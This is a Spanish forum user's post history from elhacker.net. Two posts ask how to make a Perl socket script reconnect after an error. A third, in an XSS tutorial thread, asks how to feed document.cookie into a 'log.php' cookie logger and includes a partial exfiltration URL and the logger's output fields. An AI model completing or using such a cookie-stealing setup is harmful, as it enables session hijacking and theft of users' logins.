elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Curso de javascript por TickTack


  Mostrar Mensajes
Páginas: [1]
1  Programación / Scripting / Re: Ayuda con Perl ! en: 10 Octubre 2006, 10:32 am
Gracias por responder Hendrix.


El "script" en perl que estoy haciendo funciona con sockets, y hay un IF que conecta el socket, y hay un "die" que muestra el error, por si falla el socket

Lo que quiero es que si el socket falla, y vaya a "die".., el "die" vuelva a inicar la aplicación para que el socket vuelva a conectar e intente de nuevo ó que empieze desde X linea.


Es que (en el IF) si hay un error con el socket y no conecta ya sea por que no esta conectado a internet, pues te va a enviar a "die" y supongamos que "die" te muestra el mensaje que "no estas conectado a internet", lo que quiero es que en lugar de mostrar cualquier mensaje, intente de nuevo conectarse, como digo.. reiniciando la apliacación o que empieze desde X linea;

Citar
"si hay un error con el socket, vuelve a X linea ó inicia la aplicación"



Ojala me entiendan
Saludos.
2  Programación / Scripting / Ayuda con Perl - Iniciar desde X línea en: 9 Octubre 2006, 18:06 pm
Hola soy nuevo en perl, antes programaba en visual basic pero quise ir mas allá

tengo una duda con perl,

die "\nError $!\n"; }

Quiero que si hay un error en la aplicación, el programa vuelva a iniciar desde 0, o que vuelva a tratar desde X linea.

Me explico?

saludos.
3  Informática / Tutoriales - Documentación / Re: Los Poderes Secretos de XSS (Cross Site Scripting) en: 31 Diciembre 2005, 03:23 am
Hola como utilizaria el  log.php para guardar una cookie? :huh:

por que solo abriendolo ej. www.site.com/log.php  solo te guarda esto
Código:
USUARIO Y PASSWORD:
Cookie:
Pagina:
IP: XXX.XXX.XX.XXX
Fecha y Hora: 31 December, 2005, 3:15 am
Como seria la url para que se guarde la cookie?
no es algo asi de  "www.site.com/log.php?variablenosecual=document.cookie no se que mas"

Alguien me explica?

Por favor.
Saludos ;D ;D ;D
Páginas: [1]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines